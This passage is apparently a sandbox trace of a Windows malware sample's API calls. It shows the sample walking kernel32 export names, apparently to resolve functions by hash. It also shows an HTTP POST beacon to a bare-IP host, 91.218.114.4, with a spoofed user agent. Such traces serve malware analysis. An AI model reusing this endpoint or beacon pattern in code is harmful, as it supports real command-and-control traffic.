lpString1=0x341f148, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0049.714] lstrlenA (lpString="DELETEFILEA") returned 11 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0049.714] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0049.714] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0049.714] lstrlenA (lpString="DELETEFILEW") returned 11 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0049.714] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0049.714] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0049.714] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0049.714] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0049.714] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0049.714] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0049.714] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0049.714] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0049.714] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0049.714] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0049.714] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0049.715] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0049.715] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0049.715] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0049.715] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0049.715] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0049.715] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0049.715] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0049.715] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0049.715] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0049.715] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0049.715] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0049.715] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0049.715] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0049.715] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0049.715] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0049.715] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0049.715] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0049.715] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0049.715] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0049.715] lstrcpyA (in: lpString1=0x341f148, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0049.716] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0049.716] lstrcpyA (in: lpString1=0x341f148, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0049.716] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0049.716] lstrcpyA (in: lpString1=0x341f148, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0049.716] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0049.716] lstrcpyA (in: lpString1=0x341f148, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0049.762] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0051.737] InternetCrackUrlA (in: lpszUrl="http://91.218.114.4/create/ehphacw.jspx?g=y&wp=ay", dwUrlLength=0x31, dwFlags=0x0, lpUrlComponents=0x341fd10 | out: lpUrlComponents=0x341fd10) returned 1 [0051.770] VirtualAlloc (lpAddress=0x0, dwSize=0x1400, flAllocationType=0x3000, flProtect=0x4) returned 0x3b0000 [0051.787] InternetConnectA (hInternet=0xcc0004, lpszServerName="91.218.114.4", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0051.791] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/create/ehphacw.jspx?g=y&wp=ay", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0051.794] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x2f, lpOptional=0x590000*, dwOptionalLength=0xf7) Thread: id = 60 os_tid = 0xa9c [0048.247] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xb40000 [0048.248] GetTickCount () returned 0x1145226 [0048.248] lstrlenA (lpString="kernel32.dll") returned 12 [0048.248] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0048.248] lstrcpyA (in: lpString1=0x355eba0, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0048.248] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0048.248] lstrcpyA (in: lpString1=0x355eba0, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0048.248] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0048.248] lstrcpyA (in: lpString1=0x355eba0, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0048.248] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0048.248] lstrcpyA (in: lpString1=0x355eba0, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0048.248] lstrlenA (lpString="ADDATOMA") returned 8 [0048.248] lstrcpyA (in: lpString1=0x355eba0, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0048.248] lstrlenA (lpString="ADDATOMW") returned 8 [0048.248] lstrcpyA (in: lpString1=0x355eba0, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0048.248] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0048.248] lstrcpyA (in: lpString1=0x355eba0, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0048.248] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0048.248] lstrcpyA (in: lpString1=0x355eba0, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0048.248] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0048.248] lstrcpyA (in: lpString1=0x355eba0, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0048.248] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0048.248] lstrcpyA (in: lpString1=0x355eba0, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0048.248] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0048.248] lstrcpyA (in: lpString1=0x355eba0, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0048.249] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0048.249] lstrcpyA (in: lpString1=0x355eba0, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0048.249] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0048.249] lstrcpyA (in: lpString1=0x355eba0, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0048.249] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0048.249] lstrcpyA (in: lpString1=0x355eba0, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0048.249] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0048.249] lstrcpyA (in: lpString1=0x355eba0, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0048.249] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0048.249] lstrcpyA (in: lpString1=0x355eba0, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0048.249] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0048.249] lstrcpyA (in: lpString1=0x355eba0, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0048.249] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0048.249] lstrcpyA (in: lpString1=0x355eba0, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0048.249] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0048.249] lstrcpyA (in: lpString1=0x355eba0, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0048.249] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0048.249] lstrcpyA (in: lpString1=0x355eba0, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0048.249] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0048.249] lstrcpyA (in: lpString1=0x355eba0, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0048.249] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0048.249] lstrcpyA (in: lpString1=0x355eba0, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0048.249] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0048.249] lstrcpyA (in: lpString1=0x355eba0, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0048.249] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0048.249] lstrcpyA (in: lpString1=0x355eba0, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0048.249] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0048.249] lstrcpyA (in: lpString1=0x355eba0, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0048.249] lstrlenA (lpString="BACKUPREAD") returned 10 [0048.249] lstrcpyA (in: lpString1=0x355eba0, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0048.249] lstrlenA (lpString="BACKUPSEEK") returned 10 [0048.249] lstrcpyA (in: lpString1=0x355eba0, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0048.249] lstrlenA (lpString="BACKUPWRITE") returned 11 [0048.250] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0048.250] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0048.250] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0048.250] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0048.250] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0048.250] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0048.250] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0048.250] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0048.250] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0048.250] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0048.250] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0048.250] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0048.250] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0048.250] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0048.250] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0048.250] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0048.250] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0048.250] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0048.250] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0048.250] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0048.250] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0048.250] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0048.250] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0048.250] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0048.250] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0048.250] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0048.250] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0048.250] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0048.250] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0048.250] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0048.250] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0048.250] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0048.250] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0048.251] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0048.251] lstrcpyA (in: lpString1=0x355eba0, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0048.251] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0048.251] lstrcpyA (in: lpString1=0x355eba0, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0048.251] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0048.251] lstrcpyA (in: lpString1=0x355eba0, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0048.251] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0048.251] lstrcpyA (in: lpString1=0x355eba0, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0048.251] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0048.251] lstrcpyA (in: lpString1=0x355eba0, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0048.251] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0048.251] lstrcpyA (in: lpString1=0x355eba0, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0048.251] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0048.251] lstrcpyA (in: lpString1=0x355eba0, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0048.251] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0048.251] lstrcpyA (in: lpString1=0x355eba0, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0048.251] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0048.251] lstrcpyA (in: lpString1=0x355eba0, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0048.251] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0048.251] lstrcpyA (in: lpString1=0x355eba0, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0048.251] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0048.251] lstrcpyA (in: lpString1=0x355eba0, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0048.251] lstrlenA (lpString="BEEP") returned 4 [0048.251] lstrcpyA (in: lpString1=0x355eba0, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0048.251] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0048.251] lstrcpyA (in: lpString1=0x355eba0, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0048.251] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0048.251] lstrcpyA (in: lpString1=0x355eba0, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0048.251] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0048.251] lstrcpyA (in: lpString1=0x355eba0, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0048.251] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0048.251] lstrcpyA (in: lpString1=0x355eba0, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0048.251] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0048.251] lstrcpyA (in: lpString1=0x355eba0, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0048.251] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0048.252] lstrcpyA (in: lpString1=0x355eba0, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0048.252] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0048.252] lstrcpyA (in: lpString1=0x355eba0, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0048.252] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0048.252] lstrcpyA (in: lpString1=0x355eba0, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0048.252] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0048.252] lstrcpyA (in: lpString1=0x355eba0, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0048.252] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0048.252] lstrcpyA (in: lpString1=0x355eba0, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0048.252] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0048.252] lstrcpyA (in: lpString1=0x355eba0, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0048.252] lstrlenA (lpString="CANCELIO") returned 8 [0048.252] lstrcpyA (in: lpString1=0x355eba0, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0048.252] lstrlenA (lpString="CANCELIOEX") returned 10 [0048.252] lstrcpyA (in: lpString1=0x355eba0, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0048.252] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0048.252] lstrcpyA (in: lpString1=0x355eba0, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0048.252] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0048.252] lstrcpyA (in: lpString1=0x355eba0, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0048.252] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0048.252] lstrcpyA (in: lpString1=0x355eba0, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0048.252] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0048.252] lstrcpyA (in: lpString1=0x355eba0, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0048.252] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0048.252] lstrcpyA (in: lpString1=0x355eba0, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0048.252] lstrlenA (lpString="CHECKELEVATION") returned 14 [0048.252] lstrcpyA (in: lpString1=0x355eba0, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0048.252] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0048.252] lstrcpyA (in: lpString1=0x355eba0, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0048.252] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0048.252] lstrcpyA (in: lpString1=0x355eba0, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0048.252] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0048.252] lstrcpyA (in: lpString1=0x355eba0, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0048.252] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0048.253] lstrcpyA (in: lpString1=0x355eba0, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0048.253] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0048.253] lstrcpyA (in: lpString1=0x355eba0, 